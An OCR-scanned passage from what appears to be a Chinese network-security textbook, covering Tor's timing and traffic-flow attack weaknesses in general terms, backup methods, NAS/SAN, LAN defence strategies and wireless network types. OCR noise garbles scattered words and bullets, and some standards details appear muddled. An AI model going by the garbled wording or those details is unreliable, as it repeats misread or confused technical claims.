iPhone 和 iPad 用 户 匿名 访问 网 络 。Tor 的 开发 者 逐步 修补 了 一 些 程序 漏洞 ， 不 过 目前 该 
App 还 不 完善 ， 山 特 维 克 建 议 用 户 再 等 待 一 段 时 间 。 实 际 上 她 建议 敏感 用 户 应 当 坚 持 使 
用 更 成 熟 的 Tor 桌面 端 服 务 :“ 如 果 我 需要 匿名 ， 那 么 我 可 不 会 去 考虑 手机 平台 ”。 

即使 使 用 Tor 软件 来 在 互联 网 中 变 身 “ 黑 影 人 ”, 电脑 仍然 会 有 少量 信息 泄露 到 网 上 。 
美国 国家 安全 局 甚至 可 以 从 未 加 密 的 Windows 错误 信息 来 辨别 、 追 踪 用 户 。 攻 击 者 也 能 
通过 访问 的 网 页 来 攻击 电脑 ， 突 破 浏览 器 ， 并 发 送 未 受 保护 的 信息 来 暴露 用 户 的 位 置 。 
而 基于 Tor 匿名 网 络 的 Whonix 操作 系统 会 在 本 地 创建 多 重 虚拟 主机 ， 作 为 真实 主机 的 
映像 ， 任 何 试图 攻破 计算 机 的 攻击 者 将 会 被 限制 在 虚拟 主机 中 。 
3.4.7.2 Tor 安全 缺陷 

Tor 的 缺点 : Tor 的 威胁 模型 是 一 个 较 弱 的 威胁 模型 ， 是 一 个 不 够 安全 的 威胁 模型 。 
实际 上 ，Tor 的 匿名 性 并 没有 那么 的 好 ， 但 是 作为 一 种 低 延 时 匿名 系统 ，Tor 的 目标 是 抵 
御 非 全 局 的 主动 或 者 被 动 攻击 。 

针对 Tor 的 攻击 有 两 种 : 

@ 时 间 攻 击 : 基本 思想 是 寻找 入 口 节点 和 出 口 节点 之 间 数 据 包 的 时 间 相 关 性 。 作 
为 低 时 延 匿名 系统 Tor 不 使 用 数据 包 填充 和 随机 延迟 技术 ， 因 此 消息 间 有 很 强 的 时 间 相 
关 性 。 系 统 默 认 的 路 径 长 度 是 3， 如 果 第 一 个 和 最 后 一 个 节点 合谋 攻击 ， 通 告 自己 的 下 
一 跳 和 上 一 跳 。 通 过 判断 是 否 相同 就 是 判断 是 不 是 一 条 转发 路 径 。 这 样 攻击 者 就 能 轻易 
的 判断 匿名 路 径 。 攻 击 者 还 可 以 通过 分 析 数 据 包 到 达 的 时 间 相关 性 。 防 范 措施 是 阻止 攻 
击 者 同时 控制 Tor 网 络 的 入 口 节点 和 出 口 节 点 。 


034 项 
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© 通信 流 攻击 ， 作 为 低 时 延 匿 名 系统 Tor 不 对 数据 做 复杂 的 混合 、 缓 存 重新 排序 等 
技术 操作 ， 因 此 网 络 中 通信 数据 流 的 时 间 特 性 能 够 被 监测 。 攻 击 者 发 送 一 个 特殊 的 消息 
流 ， 监 测 某 一 个 中 间 节 点 的 通信 延迟 。 根 据 这 些 延 迟 判断 是 否 通过 被 监测 的 节点 。 


3.4.8 网络 备份 


任何 一 种 计算 机 系统 或 计算 机 网 络 系统 都 没有 把 握 免 受 每 一 种 天 灾 人 祸 的 威胁 ， 特 
别 是 能 够 摧毁 整个 建筑 物 的 灾难 诸如 地 震 、 火 灾 、 狂 风暴 雨 等 大 规模 的 环境 威胁 。 

灾难 是 指导 致 信息 系统 丧失 技术 服务 能 力 的 事件 。 灾 难 是 典型 的 破坏 正常 业务 活动 
和 系统 运行 的 事件 ， 其 破坏 性 可 以 用 货币 来 量化 。 灾 难 有 很 多 种 形式 ， 但 是 总 体 来 说 可 
以 分 为 “自然 的 ”和 “人 为 的 ”。 

自然 的 灾难 包括 地 震 、 龙 卷 风 、 火 灾 、 洪 水 、 飓 风 等 。 人 为 的 灾难 包括 爆炸 ， 停 电 ， 
应 用 系统 故障 ， 硬 件 失效 ， 黑 客 攻 击 、 分 布 式 拒绝 攻击 以 及 病毒 攻击 ， 人 为 破坏 等 。 

灾难 恢复 是 对 偶然 事件 的 预防 计划 。 除 了 采取 所 有 必要 的 措施 应 付 可 能 发 生 的 最 坏 
情况 之 外 ， 用 户 还 需要 有 备份 计划 。 当 灾难 真 的 发 生 时 ， 可 以 用 来 恢复 。 

用 于 备份 的 设备 有 硬盘 、 光 盘 、 磁 带 三 种 ， 如 表 3-14 所 示 。 


表 3-14 三 种 备份 设备 比较 


磁带 技术 
存 取 a 


备份 成 本 最 高 ,用 于 在 线 数据 | 成 本 较 高 , 用 于 数据 的 运载 与 文 的 | 成 本 最 低 , 不适 于 在 线 备 
成 本 的 存储 永久 归档 份 


由 于 光盘 是 通过 拷贝 命令 来 获得 
可 管 由 于 硬盘 的 故障 发 生 率 | 系统 中 的 数据 ,因此 无 法 获得 网 络 | 可 对 整个 系统 进行 备份 。 
理性 较 高 ,不 能 完全 满足 要 求 | 系统 的 完全 备份 。 其 次 ， 光 盘 也 难 | 易于 保存 
以 备份 正在 使 用 中 的 文件 


备份 方式 有 三 种 : 完全 备份 、 增 量 备 份 、 差 异 备份 。 

完全 备份 就 是 对 服务 器 上 的 所 有 文件 完全 进行 归档 。 这 是 进行 安全 恢复 的 最 佳 方 
案 ， 这 个 文件 系统 的 完整 副本 都 完全 存储 在 一 份 或 者 一 组 备份 设备 中 。 这 种 方法 的 最 大 
缺点 就 是 相对 于 其 他 备份 方法 需要 更 多 的 时 间 和 空间 。 

增 量 备份 是 指 只 把 最 近 新 生成 的 或 者 新 修改 的 文件 拷贝 到 备份 设备 上 。 由 于 这 种 方 
法 只 是 对 上 次 备份 后 的 文件 进行 归档 ， 所 以 备份 速度 快 。 例 如 ， 有 些 公 司 每 星期 进行 一 
次 完全 备份 , 但 是 每 天 晚上 都 进行 增 量 备份 〈 增 量 备份 是 有 时 间 顺 序 的 )。 如 果 灾难 真 的 
发 生 时 ， 用 户 需 要 重建 系统 ， 首 先 要 恢复 完全 备份 中 的 内 容 ， 然 后 再 按照 顺序 恢复 上 次 
完全 备份 执行 后 的 每 次 增 量 备份 。 增 量 备份 的 最 大 缺点 是 不 能 记录 删除 文件 的 信息 。 

差异 备份 与 增 量 备份 很 相似 。 两 者 所 不 同 的 是 ， 差 异 备 份 对 上 次 备份 后 所 有 发 生 改 
变 的 文件 都 进行 备份 (包括 删除 文件 的 信息 ), 并 且 不 是 从 上 次 备份 的 时 间 开始 计算 。 例 
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如 ， 如 果 用 户 在 星期 一 进行 了 完全 备份 ， 然 后 在 随后 的 每 天 晚上 进行 差异 备份 。 这 样 星 
期 四 晚上 的 备份 内 容 会 包括 从 星期 二 到 星期 四 的 所 有 发 生 改 变 的 文件 信息 。 这 样 在 进行 
恢复 时 ， 就 加 速 了 恢复 过 程 。 

网 络 由 众多 成 分 如 通信 介质 、 路 由 器 、 交 换 机 、 服 务 器 等 组 成 。 任 一 环节 出 现 灾难 ， 
都 会 导致 不 能 提供 正常 的 网 络 服 务 。 仅 仅 采 用 服务 器 元 余 技 术 ， 并 不 能 保证 网 络 能 提供 
正常 服务 ， 而 网 络 服务 的 中 断 有 时 根本 不 在 服务 提供 者 所 能 控制 的 范围 内 。 例 如 自然 灾 
害 造成 通信 中 断 。 因 此 需要 对 网 络 灾难 做 好 准备 。 

在 网 络 备份 中 比较 常见 的 存储 架构 有 NAS 和 SAN. 

NAS (NetworkAttachedStorage) 通常 译 为 “网 络 附加 存储 ”或 “网 络 连接 存储 ”。 
意思 是 连接 在 网 络 上 的 存储 设备 。 NAS 是 适应 信息 存储 和 共享 的 应 用 需求 而 产生 的 网 络 
存储 技术 ， 因 其 具备 简便 高 效 的 特点 而 得 到 广泛 的 应 用 。 

NAS 是 利用 现 有 的 网 络 环境 , 将 网 络 中 某 一 台 计 算 机 作为 中 心 的 备份 方案 。 通过 部 
署 专业 的 备份 软件 对 网 络 中 的 计算 机 进行 集中 备份 。 这 样 可 以 利用 现 有 的 网 络 环境 ， 而 
且 可 以 实现 备份 的 集中 管理 ， 而 且 成 本 相对 不 高 。 这 也 是 现代 企业 级 备份 中 通常 采用 的 
方案 。 

SAN (StorageAreaNetwork) 通常 译 为 “存储 区 域 网 络 ”。 它 是 一 种 在 服务 器 和 外 部 
存储 资源 或 独立 的 存储 资源 之 间 实 现 高 速 可 靠 访问 的 专用 网 络 。SAN 采用 可 扩展 的 网 络 
拓扑 结构 连接 服务 器 和 存储 设备 ， 每 个 存储 设备 不 隶属 于 任何 一 台 服 务 器 ， 所 有 的 存储 
设备 都 可 以 在 全 部 的 网 络 服务 器 之 间作 为 对 等 资源 共享 。 

SAN 不 采用 现 有 的 网 络 ， 而 是 另外 建立 一 个 专门 的 网 络 来 实现 备份 数据 ， 而 且 通 常 
情况 是 使 用 光纤 通道 (FibreChannel)。 它 不 仅仅 可 以 实现 NAS 的 功能 ， 而 且 避 免 了 由 于 
网 络 备份 造成 的 对 网 络 资源 的 持续 占用 。 这 在 对 于 备份 相对 重要 ， 数 据 量 相对 比较 庞大 
的 时 候 是 一 个 比较 有 效果 的 一 种 方式 。 当 然 ， 价 格 相对 比较 昂贵 。 


3.4.9 网络 安 全 防范 意识 与 策略 


网 络 安全 的 威胁 来 自 各 个 方面 ， 只 有 消除 了 所 有 的 安全 威胁 ， 网 络 才 有 可 能 是 安全 
的 。 但 任何 一 个 网 络 ， 要 真 的 要 消除 各 种 威胁 和 隐患 ， 显 然 是 不 可 能 的 。 因 此 ， 采 取 积 
极 的 防御 措施 是 保证 网 络 安全 的 前 提 。 总 的 来 说 ， 需 要 技术 与 管理 并 重 。 具 体 途 径 是 : 

1. 保证 通信 安全 

对 链 路 、 信 息 进行 加 密 ， 实 行 访 问 控制 。 

2. 保证 信息 安全 

采取 技术 、 管 理 等 措施 ， 保 护 信息 ， 使 信息 的 保密 性 、 完 整 性 和 可 用 性 得 到 保障 。 

3. 加 强 安全 保障 

加 强 信息 安全 保障 措施 ， 协 同 加 强 信息 安全 。 主 要 包括 三 个 方面 的 措施 : 

ORW: 对 系统 的 脆弱 性 、 外 部 入 侵 、 内 部 入 侵 、 滥 用 、 误 用 进行 检测 ， 及 时 发 现 、 
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修补 漏洞 。 

回响 应 : 对 各 种 安全 事件 及 时 响应 ， 把 不 安全 因素 消灭 在 萌芽 状态 。 

OKR: 制定 完整 的 恢复 计划 ， 使 得 在 网 络 万 一 不 能 提供 服务 时 ， 能 够 及 时 、 
地 恢复 。 
3.49.1 桌面 用 户 的 网 络 安全 防范 策略 

桌面 用 户 上 网 时 可 能 会 遇 到 的 入 侵 方式 大 概 包括 了 以 下 几 种 : 

。 系统 被 病毒 、 木 马 、 蠕 虫 、 间 谍 软 件 、 流 氓 软件 攻击 ; 

。 浏览 网 页 时 被 恶意 程序 攻击 ; 

© P2P 工具 (如 QQ) 被 攻击 或 泄露 信息 ; 
。 垃圾 信息 ; 


at 
Re 


操作 系统 或 应 用 软件 存在 漏洞 ， 易 受 黑客 攻击 ; 

人 敏感 信息 被 盗 ; 
。 其 他 黑客 攻击 。 
桌面 用 户 的 网 络 防范 方法 如 下 : 
。 加 强 技术 学 习 ， 了 解 各 种 安全 威胁 ， 不 断 提高 网 络 安全 的 防御 水 平 ; 
。 制定 网 络 安全 保障 的 规范 和 制度 ， 培 养 良 好 的 网 络 安 全 防护 意识 和 习惯 ; 
© 定期 查 杀 计算 机 病毒 ， 及 时 升级 病毒 签名 库 ; 
o 禁用 guest 账号 ， 将 系统 内 建 的 administrator 账号 改名 〈 越 复杂 越 好 ， 最 好 改 成 
中 文 的 )， 而 且 使 要 强 密码 。 如 果 可 能 ， 使 用 受 限 用 户 上 网 ; 
禁用 不 需要 的 端口 和 服务 。 如 果 可 能 ， 务 载 这 些 服务 
注意 各 种 漏洞 公告 ， 及 时 给 系统 打 补丁 
周期 备份 系统 中 重要 的 数据 和 文件 。 
3.4.9.2 ”局 域 网 的 安全 防范 策略 

威胁 局 域 网 的 安全 风险 很 多 ， 按 性 质 大致 可 以 分 为 两 种 : 一 是 对 信息 的 威胁 ; 二 是 
对 设备 的 威胁 。 有 计算 机 系统 本 身 的 不 可 靠 性 、 环 境 干扰 以 及 自然 灾害 等 因素 引起 的 
也 有 工作 失误 ， 操 作 不 当 造 成 的 ， 而 人 为 故意 的 未 授权 窃取 、 破 坏 ， 敌 对 性 活动 危害 更 
大 。 概 括 起 来 ， 局 域 网 中 存在 的 安全 风险 主要 有 以 下 4 个 方面 : 

@ 计算 机 病毒 的 破坏 。 

@ 恶意 攻击 。 此 类 攻击 可 分 为 两 类 : 一 是 主动 攻击 ， 对 局 域 网 进行 全 面 破坏 ， 致 
使 局 域 网 部 分 或 全 面 次 病 。 另 一 类 是 被 动 攻击 ， 只 是 宕 探 、 窃 取 重 要 信息 ， 但 不 影响 局 
域 网 的 正常 工作 。 

© 人 为 失误 。 网 络 管理 员 安 全 意识 不 强 ， 用 户 的 口令 选择 不 慎 ， 将 自己 的 账号 随 
意 转 借 他 人 或 与 别人 共享 等 都 会 对 网 络 安全 带 来 威胁 。 

© 软件 本 身 的 漏洞 。 网 络 软 件 中 往往 存在 一 些 安全 漏洞 ， 而 这 些 漏洞 恰恰 是 黑客 
攻击 的 首选 目标 。 
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局 域 网 的 安全 防范 策略 有 : 

(1) 物理 安全 策略 

物理 安全 策略 是 指 计算 机 及 通信 设备 的 安全 ， 如 设备 的 温度 、 湿 度 、 防 静电 、 防 磁 
场 、 防 电子 辐射 等 性 能 ， 保 护 传输 线路 的 安全 ， 集 中 器 和 调制 解 调 器 应 置 于 受 监视 的 地 
方 ， 以 防 外 连 的 企图 ， 并 定期 检查 ， 以 防 搭 线 寡 听 、 外 连 或 破坏 行为 发 生 ， 对 于 储存 数 
据 的 磁带 、 磁 盘 和 光盘 等 进行 安全 维护 ， 数 据 定 期 备份 ， 重 要 硬件 也 应 双 备 份 。 

(2) 划分 VLAN 防止 网 络 侦 听 

运用 VLAN (VirtualLocalAreaNetwork， 虚 拟 局 域 网 ) 技术 ， 将 以 太 网 通信 变 为 点 
到 点 通信 ， 防 止 大 部 分 基于 网 络 侦 听 的 入 侵 。VLAN 是 一 个 在 物理 网 络 上 根据 用 途 、 工 
作 组 、 应 用 来 逻辑 划分 的 局 域 网 络 ， 是 一 个 广播 域 与 用 户 的 物理 位 置 无 关 。VLAN 中 的 
网 络 用 户 是 通过 LAN 交换 机 来 通信 的 。 一 个 VLAN 中 的 成 员 看 不 到 另 一 个 VLAN 中 的 
成 员 。 不同 的 VLAN 成 员 之 间 不 可 直接 通信 需要 通过 路 由 支持 才能 通信 只 有 有 具备 同一 个 
VLAN 成 员 资格 的 分 组 数据 才能 直接 通信 。 因 此 可 以 将 非法 用 户 与 敏感 的 网 络 资源 相互 
隔离 ， 从 而 防止 可 能 发 生 的 非法 侦 听 。 目 前 的 VLAN 技术 主要 有 三 种 : 基于 交换 机 端口 
的 VLAN、 基 于 节点 MAC 地 址 的 VLAN 和 基于 应 用 协议 的 VLAN. 

(3) 网 络 分 段 

对 于 总 线 型 以 太 网 ， 虽 然 结 构 简 单 ， 但 由 于 用 户 都 连接 在 同一 网 段 上 ， 这 意味 着 ， 
任何 两 个 主机 之 间 的 通信 数据 包 ， 不 仅 为 这 两 个 主机 的 网 卡 所 接收 ， 也 同时 为 处 在 同一 
以 太 网 上 的 任何 一 个 主机 的 网 卡 所 和 截取。 因此， 黑客 只 要 接 入 以 太 网 上 的 任 一 节点 进行 
侦 听 ， 就 可 以 捕获 发 生 在 这 个 以 太 网 上 的 所 有 数据 包 。 针 对 这 一 网 络 安全 隐患 ， 应 该 采 
用 子 网 互 连 的 分 段 网 络 结构 ， 如 划分 人 事 、 财 务 、 生 产 等 子 网 ， 子 网 地 址 分 别 为 1.0.1.0, 
1.0.2.0，1.0.3.0。 通 过 路 由 器 将 局 域 网 分 段 ， 网络 主机 发 出 的 广播 只 能 被 相同 网 络 上 的 其 
他 主机 接收 ， 路 由 器 将 广播 隔离 开 来 ， 防 止 了 可 能 的 非法 侦 听 。 

(4) 以 交换 机 代替 共享 式 集线器 

使 用 共享 式 集线器 ， 当 用 户 与 主机 进行 数据 通信 时 ， 两 台 机 器 之 间 的 数据 包 〈 称 为 
单 播 包 UnicastPacket) 还 是 会 被 同一 台 集线器 上 的 其 他 用 户 所 侦 听 。 交 换 机 可 以 使 单 播 
包 仅 在 两 个 节点 之 间 传 送 ， 从 而 防止 非法 侦 听 。 当 然 ， 交 换 机 只 能 控制 单 播 包 而 无 法 控 
制 广播 包 〈BroadcastPacket) 和 多 播 包 〈MmulticastPacket)。 所 幸 的 是 ， 广 播 包 和 多 播 包 
内 的 关键 信息 ， 要 远 远 少 于 单 播 包 。 

(5) 访问 控制 策略 

访问 控制 是 对 访问 者 及 访问 过 程 的 一 种 权限 授予 。 访 问 控制 是 在 鉴别 机 制 提供 的 信 
息 基 础 上 ， 对 内 部 文件 和 数据 库 的 安全 属性 和 共享 程度 进行 设置 ， 对 用 户 的 使 用 权限 ; 
行 划分 。 对 用 户 的 访问 控制 可 在 网 络 层 和 信息 层 两 个 层次 进行 ， 即 在 用 户 进 入 网 络 和 访 
问 数据 库 或 服务 器 时 ， 对 用 户 身份 分 别 进行 验证 。 如 采用 IEEE802.1X 和 RADIUS 认证 
服务 。 
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(6) 使 用 数字 签名 

基于 先进 密 钥 技术 的 数字 签名 是 系统 防止 数据 在 产生 、 存 放 和 运输 过 程 中 不 被 算 改 
的 主要 技术 手段 。 数 字 签 名 所 用 的 签署 信息 是 签名 者 所 专 有 的 , 并 且 是 秘密 的 和 唯一 的 ， 
签名 只 能 由 签名 者 的 专用 信息 来 产生 。 数 字 签名 实际 上 是 一 个 双方 应 用 密 文 进 行 签名 和 
确认 的 过 程 ， 是 数据 完整 性 、 公 证 以 及 认证 机 制 的 基础 。 数 字 签 名 不 但 能 使 接收 方 确保 
发 送 源 的 真实 性 ， 也 能 保证 发 送 和 接收 双方 对 自己 的 行为 无 法 否认 。 

(7) 用 户 管理 策略 

绝 大 多 数 的 网 络 安全 问题 是 由 内 部 人 员 带 来 的 。 因 此 ， 局 域 网 内 部 需要 制定 严格 的 
规章 制度 和 措施 ， 加 强 对 人 员 的 审查 和 管理 ， 结 合 软 硬 件 及 数据 方面 的 安全 问题 进行 安 
全 教育 ， 提 高 工作 人 员 的 保密 观念 和 责任 心 ， 严 守 操 作 规则 和 各 项 保密 规定 ， 防 止 人 为 
事故 的 发 生 ， 加 强 对 信息 的 安全 管理 ， 对 各 种 信息 进行 等 级 分 类 ， 有 绝密 、 机 密 、 秘 密 
和 非 秘密 信息 等 ， 对 保密 数据 从 采集 、 传 输 、 处 理 、 储 存 和 使 用 等 整个 过 程 ， 都 要 对 数 
据 采 取 安 全 措施 ， 防 止 数据 有 意 或 无 意 泄露 。 

(8) 使 用 代理 服务 器 

代理 服务 器 的 使 用 可 以 使 内 部 网 络 成 为 一 个 独立 的 封闭 回路 ， 从 而 使 网 络 更 加 安 
全 。 通 过 对 代理 服务 器 的 设置 ， 可 以 对 客户 身份 进行 认证 和 对 各 种 信息 进行 过 滤 ， 限 制 
有 害 信息 的 进入 和 限制 对 某 些 主机 或 域 的 访问 ， 网 络 管理 人 员 也 可 以 通过 代理 服务 器 的 
日 志 获 取 更 多 的 网 管 信息 。 

(9) 防火 墙 控制 

防火 墙 是 以 阻止 网 络 中 的 黑客 访问 某 个 机 构 网 络 的 屏障 ， 在 网 络 边界 上 通过 建立 起 
来 的 相应 网 络 通信 监控 系统 来 隔离 内 部 和 外 部 网 络 ， 以 阻挡 外 部 网 络 的 侵入 。 

(10) 入 侵 检 测 系统 

在 网 络 边界 安装 IDS， 及 时 捕获 数据 包 ， 发 现 入 侵 。 

(11) 定期 进行 漏洞 安全 扫描 

定期 用 多 种 漏洞 安全 扫描 软件 对 整个 网 络 实施 安全 扫描 ， 发 现 系统 漏洞 和 其 他 脆弱 
性 问题 。 

(12) 建立 完善 的 网 络 安全 应 急 响 应 机 制 

建立 各 种 网 络 安全 事件 的 应 急 预 案 ， 减 少 安全 事件 带 来 的 影响 和 损失 。 

(13) 使 用 VPN 

(EF VPN, 扩展 单位 的 计算 机 网 络 到 全 国 各 点 、 甚 至 全 球 ， 让 信息 流通 和 资源 共享 
无 处 不 在 和 无 时 不 在 。 

网 络 安全 是 一 个 综合 性 课题 ， 是 一 个 复杂 的 系统 工程 ， 不 仅 是 技术 问题 ， 更 是 管理 
问题 ， 同 时 还 涉及 立法 、 使 用 等 方方面面 。 另 外 ， 网 络 安全 技术 也 不 是 某 一 方面 的 ， 一 
种 技术 只 能 解决 一 方面 问题 ， 需 要 纵深 防御 技术 。 总 之 ， 网 络 安全 研究 的 空间 非常 大 ， 
任务 非常 艰巨 。 
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3.5 ”无线 网 络 安全 


计算 技术 与 移动 通信 的 结合 ， 使 得 沟通 无 处 不 在 ， 任 何人 “Whoever) 在 任何 时 候 
(Whenever) 和 任何 地 方 (Wherever) 与 任何 人 (Whomever) 都 能 够 以 任何 形式 (Whatever) 
进行 通信 成 为 可 能 。 无 线 网 络 已 经 从 初期 的 单一 业务 网 络 进 化 为 当前 涵盖 各 种 无 线 通信 
技术 、 面 向 众多 应 用 行业 、 提 供 多 样 化 业务 的 智能 化 通信 系统 。 随 着 无 线 通信 及 其 相关 
技术 的 不 断 发 展 ， 无 线 网 络 正 在 成 为 实现 人 们 长 期 追求 的 随时 随地 获取 信息 和 享受 方便 
廉价 网 络 服务 目标 的 基础 。 但 另 一 方面 ， 在 各 种 无 线 网 络 鞍 勃 发 展 的 同时 ， 它 们 所 面临 
的 安全 与 隐私 问题 也 日 益 严峻 :由 于 无 线 网 络 采 用 的 是 无 线 通信 信道 ， 这 就 给 无 线 网 络 
带 来 了 比 传统 有 线 网 络 更 加 严重 的 安全 问题 ， 网 络 安全 问题 成 为 制约 无 线 网 络 发 展 的 一 
个 重要 因素 。 

3.5.1 无 线 网 络 基本 知识 


根据 所 采用 的 通信 技术 、 网 络 规模 以 及 应 用 场景 的 不 同 ， 无 线 网 络 存 在 多 种 分 类 
Fx. 

根据 网 络 履 盖 范 围 、 传 输 速率 和 用 途 的 差异 ， 无 线 网 络 大 体 可 分 为 无 线 广域网 、 无 
线 城 域 网 、 无 线 局 域 网 、 无 线 个 域 网 和 无 线 体 域 网 。 

1， 无 线 广域网 CWirelessWideAreaNetwork, WWAN) 

主要 通过 通信 卫星 把 物理 距离 极为 分 散 的 局 域 网 (LocalAreaNetwork，LAN) 连接 
起 来 ， 它 连接 地 理 范 围 较 大 ， 常 常 是 一 个 国家 或 是 一 个 洲 。 其 目的 是 为 了 让 分 布 较 远 的 
各 局 域 网 互 连 ， 它 的 结构 分 为 末端 系统 〈 两 端的 用 户 集合 ) 和 通信 系统 〈 中 间 链 路 ) 两 
部 分 。 代 表 技术 有 传统 的 GSM 网 络 、GPRS 网 络 以 及 正在 实现 的 3G 网 络 和 LTE 
(LongTermEvolution) 等 类 似 系统 。 由 于 使 用 的 通信 技术 不 尽 相 同 ， 不 同 无 线 网 络 的 接 
入 速度 也 有 很 大 差异 ， 从 2GGSMCDMA 的 9.6Kbps ， 到 25GCDMA 的 
70Kbps~153.6Kbps， 再 到 36 WCDMA/CDMA2000/TD-SCDMA 的 384Kbps~2Mbps， 数 
据 的 传输 速率 在 不 断 提高 。 在 技术 标准 方面 ，IEEE802.20 是 WWAN 的 重要 标准 。 
IEEE802.20 是 由 IEEE802.16 工作 组 于 2002 年 3 月 提出 的 ， 并 成 立 专门 的 工作 小 组 ， 这 
个 小 组 是 2002 年 9 月 独立 为 IEEE802.20 工作 组 。IEEE802.20 是 为 了 实现 高 速 移动 环境 
下 的 高 速率 数据 传输 ， 以 弥补 IEEE802.1x 协议 族 在 移动 性 上 的 劣势 。 它 可 以 有 效 地 解决 
移动 性 与 传输 速率 相互 矛盾 的 问题 ， 是 一 种 适用 于 高 速 移动 环境 下 的 宽带 无 线 接 入 系统 
空中 接口 规范 。IEEE802.20 标准 在 物理 层 技术 上 ， 以 正 交 频 分 复 用 技术 (OFDM) 和 多 
输入 多 输出 技术 (MIMO) 为 核心 ， 充 分 挖掘 时 域 、 频 域 和 空间 域 的 资源 ， 大 大 提高 了 
系统 的 频谱 效率 。 在 设计 理念 上 , 基于 分 组 数据 的 纯 IP 架构 适应 突 发 性 数据 业务 的 性 能 
IRF 3G 技术 ， 与 3.5G 性 能 相当 。 在 实现 和 部 署 成 本 上 也 具有 较 大 的 优势 。IEEE802.20 
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能 够 满足 无 线 通信 市 场 高 移动 性 和 高 吞 叶 量 的 需求 ， 具 有 性 能 好 、 效 率 高 、 成 本 低 和 部 
署 灵活 等 特点 。IEEE802.20 在 移动 性 方面 优 于 IEEE802.11， 在 数据 吞吐 量 上 强 于 3G 技 
术 ， 其 设计 理念 符合 下 一 代 无 线 通信 技术 的 发 展 方向 ， 因 而 是 一 种 非常 有 前 景 的 无 线 
技术 。 

2. 无 线 城 域 网 (WirelessMetropolitanAreaNetwork, WMAN) 

主要 通过 移动 电话 或 车 载 装置 进行 移动 数据 通信 ， 可 覆盖 城市 中 的 大 部 分 地 区 。 代 
表 技 术 是 IEEE802.20 标准 ， 主 要 针对 移动 宽带 无 线 接 入 (MobileBroadband 
WirelessAccess，MBWA )。 该 标准 强调 移动 性 (支持 速度 可 高 达 时 速 250 km), fH 
IEEE802.16 宽带 无 线 接 入 (BroadbandWirelessAccess，BWA) 发 展 而 来 。 另 一 个 代表 技 
术 是 IEEE802.16 标准 体系 ， 主 要 有 802.16、802.16a、802.16e 等 。 其 中 802.16 针对 一 点 
对 多 点 ，802.16a 是 它 的 补充 ， 增 加 了 对 非 视 距 CNLOS, NoneLineofSight) 和 网 状 结构 
(MeshMode) 的 支持 ，802.16e 是 对 802.16d 的 增强 ,支持 在 2-11GHz 频段 下 的 固定 和 车 
速 移动 业务 ， 并 支持 基站 和 扁 区 间 的 切换 。802.16a/e 也 称 为 WiMAX。802.16m 是 目前 
正在 制定 的 最 新 版 本 (静止 接收 1Gb/s， 移 动 接收 100Mb/s)。 

3. 无 线 局 域 网 (WirelessLocalAreaNetwork, WLAN) 

覆盖 范围 较 小 。 无 线 局 域 网 是 高 速 发 展 的 现代 无 线 通信 技术 在 计算 机 网 络 中 的 应 
用 ， 利 用 无 线 技术 在 空中 传输 数据 、 话 音 和 视频 信号 。 作 为 传统 布线 网 络 的 一 种 替代 方 
案 或 延伸 ，WLAN 把 个 人 从 办 公 桌 边 解 放 了 出 来 ,使 他 们 可 以 随时 随地 获取 信息 ， 提 高 
了 员工 的 办 公 效 率 。 此 外 ，WLAN 还 有 其 他 一 些 优点 : 它 能 够 方便 地 联网 ， 因 为 WLAN 
可 以 便捷 、 迅 速 地 接纳 新 加 入 的 雇员 ， 而 不 必 对 网 络 的 用 户 管理 配置 进行 过 多 的 变动 ; 
WLAN 在 有 线 网 络 布线 困难 的 地 方 比 较 容易 实施 ， 使 用 WLAN 方案 ， 则 不 必 再 实施 打 
孔 铺 线 等 作业 ， 因 而 不 会 对 建筑 设施 造成 任何 损害 。 在 技术 标准 方面 ， 由 于 WLAN 是 
基于 计算 机 网 络 与 无 线 通信 技术 ， 而 在 计算 机 网 络 结构 中 ， 逻 辑 链 路 控制 (LLC) 层 及 
其 之 上 的 应 用 层 对 不 同 的 物理 层 的 要 求 可 以 是 相同 的 ， 也 可 以 是 不 同 的 。 因 此 ，WLAN 
标准 主要 是 针对 物理 层 和 媒质 访问 控制 层 (MAC)， 涉 及 所 使 用 的 无 线 频率 范围 、 空 中 
接口 通信 协议 等 技术 规范 与 技术 标准 。 数 据 传 输 速率 为 11 一 500Mb/s 之 间 (甚至 更 高 )。 
无 线 连接 距离 在 30 一 100 m。 代 表 技 术 是 IEEE802.11 系列 ， 以 及 HomeRF 技术 。 
IEEE802.11 标准 系列 包含 802.11b/a/g 这 3 个 WLAN 标准 ， 主 要 用 于 解决 办 公 室 局 域 网 
和 校园 网 中 用 户 终端 的 无 线 接 入 。 其 中 ，802.11b 的 工作 频段 为 2.4 一 2.4835GHz， 数 据 
传输 速率 达到 11Mb/s， 传输 距离 100-300 m。802.11a 的 工作 频段 为 5.15 一 5.825GHz， 数 
据 传 输 速率 达到 54Mb/s， 传 输 距 离 10-100 m， 但 由 于 技术 成 本 过 高 ， 因 此 ， 该 技术 缺乏 
价格 优势 。802.11g 标准 拥有 802.11a 的 传输 速率 ， 安 全 性 较 802.11b 好 ， 且 与 802.11a 
和 802.11b 兼容 。 

4. 无 线 个 域 网 (WirelessPersonalAreaNetwork，WPAN) 

通常 指 近 距离 范围 内 的 设备 建立 无 线 连 接 , 是 为 了 实现 活动 半径 小 、 业务 类 型 丰富 、 
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面向 特定 群体 、 无 线 无 颖 的 连接 而 提出 的 新 兴 无 线 通 信 网 络 技术 。WPAN 能 够 有 效 地 解 
决 “ 最 后 的 几米 电缆 ”的 问题 ， 进 而 将 无 线 联网 进行 到 底 。 在 网 络 构 成 上 ，WPAN 位 于 
整个 网 络 链 的 末端 , 用 于 实现 同一 地 点 终端 与 终端 间 的 连接 , 如 连接 手机 和 蓝牙 耳机 等 。 
WPAN 所 覆盖 的 范围 一 般 在 10m 半径 以 内 ， 必 须 运 行 于 许可 的 无 线 频段 。 目 前 ，IEEE、 
ITU 和 HomeRF 等 组 织 都 致力 于 WPAN 标准 的 研究 , 其 中 IEEE 组 织 对 WPAN 的 规范 标 
准 主要 集中 在 IEEE802.15 系列 。 IEEE802.15.1 本 质 上 只 是 蓝牙 底层 协议 的 一 个 正式 标准 
化 版 本 ， 大 多 数 标 准 制定 工作 仍 由 蓝牙 特别 兴趣 组 〈SIG) 完成 ， 其 成 果 由 IEEE 批准 ， 
原始 的 IEEE802.15.1 标准 基于 Bluetooth1.1。IEEE802.15.1a 对 应 于 Bluetooth1.2, 它 包括 
某 些 QoS 增强 功能 ， 并 完全 后 向 兼容 。 最 新 的 版 本 是 蓝牙 4.2。IEEE802.15.2 负责 建 模 
